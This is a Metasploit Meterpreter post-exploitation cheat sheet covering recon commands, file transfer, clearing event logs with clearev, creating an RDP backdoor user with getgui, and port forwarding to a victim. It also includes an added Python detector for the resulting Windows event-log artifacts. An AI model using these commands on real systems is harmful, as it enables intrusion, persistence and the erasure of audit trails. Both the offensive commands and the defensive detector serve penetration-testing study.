meterpreter
help # shows help
background # puts the current session in the background; we can inspect backgrounded sessions with the sessions command
Once we get onto a machine we generally perform these actions:
getuid # what privilege do we have on the remote machine
sysinfo # provides info on the target system
ps # shows the list of active processes on the target machine
shell # drops to a system shell
Once on a system shell, we can go back to our meterpreter session by issuing:
exit
We can manage (e.g., download/upload) files with:
download filename
upload filename
search filename # searches for the file on the filesystem
From the meterpreter session we can do:
load <module> # we can press tab to check available modules
We can also run specific scripts generally used in the post-exploitation phase, such as:
run # double tab to list all options
run post/linux/gather/checkvm # checks whether the target machine is a VM
Notice that these post-exploitation modules can also be run outside Meterpreter: background the session and set the session id as an option of the module.
We can also clear all the event logs by doing:
clearev
Another cool option is to enable RDP on a compromised machine and create a new user; this can be done by typing:
run getgui -u (USERNAME) -p (PASSWORD)
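From the defender's side, clearev and getgui both leave Windows event-log artifacts (1102/104 for cleared logs, 4720 and 4732 for a new account added to a local group). The following detector is an added example, not part of the original cheat sheet; the log line format and the sample events are constructed for illustration.

```python
import re

# Constructed sample export (not real telemetry): "timestamp channel event_id key=value ...".
# 4720 = user account created, 4732 = member added to a local group,
# 1102 = Security log cleared, 104 (System channel) = another log cleared.
SAMPLE_LOG = """\
2024-03-01T09:58:12Z Security 4624 Account=svc_backup LogonType=3
2024-03-01T10:01:03Z Security 4720 TargetAccount=support2 Subject=svc_backup
2024-03-01T10:01:04Z Security 4732 Member=support2 Group=Remote Desktop Users Subject=svc_backup
2024-03-01T10:01:05Z Security 4732 Member=support2 Group=Administrators Subject=svc_backup
2024-03-01T10:06:40Z Security 1102 Subject=svc_backup
2024-03-01T10:06:41Z System 104 Channel=Application Subject=svc_backup
2024-03-01T10:06:41Z System 104 Channel=System Subject=svc_backup
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<channel>\S+) (?P<eid>\d+)(?P<rest>.*)$")
RDP_GROUPS = {"Remote Desktop Users", "Administrators"}  # groups that grant RDP / admin access


def parse_line(line):
    """Parse one constructed log line into a dict; values may contain spaces."""
    m = LINE_RE.match(line)
    if not m:
        return None
    fields = dict(re.findall(r"(\w+)=(.*?)(?=\s\w+=|$)", m["rest"].strip()))
    return {"ts": m["ts"], "channel": m["channel"], "eid": int(m["eid"]), **fields}


def detect(log_text):
    """Return (rule, timestamp, detail) tuples for getgui- and clearev-style artifacts."""
    findings = []
    created = set()  # accounts seen in a 4720 event so far
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        eid = ev["eid"]
        if eid == 4720:
            created.add(ev.get("TargetAccount"))
        # A freshly created account immediately granted RDP/admin rights is the getgui pattern.
        elif eid == 4732 and ev.get("Member") in created and ev.get("Group") in RDP_GROUPS:
            findings.append(("new-account-rdp-access", ev["ts"],
                             f"{ev['Member']} added to {ev['Group']} by {ev.get('Subject')}"))
        # clearev wipes Security (1102) as well as System/Application (104 in the System channel).
        elif eid == 1102 or (eid == 104 and ev["channel"] == "System"):
            cleared = ev.get("Channel", "Security")
            findings.append(("event-log-cleared", ev["ts"],
                             f"{cleared} log cleared by {ev.get('Subject')}"))
    return findings
```

Running detect(SAMPLE_LOG) yields two new-account-rdp-access findings followed by three event-log-cleared findings, all attributed to the same subject, which is the sequence a SIEM rule would chain together.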
Meterpreter Port Forwarding
We can perform port forwarding in Metasploit much like with SSH tunnels. For example, if a service is listening on the attacked machine, we can forward it to a custom port on our localhost by doing:
portfwd add -l 1234 -p 25 -r 192.168.1.99 # our port 1234 now mirrors port 25 on the victim 192.168.1.99
# notice that we may now run exploits against our localhost, e.g.:
# ./super_remote_mail_exploit --target 127.0.0.1:1234 # this reaches the victim's port 25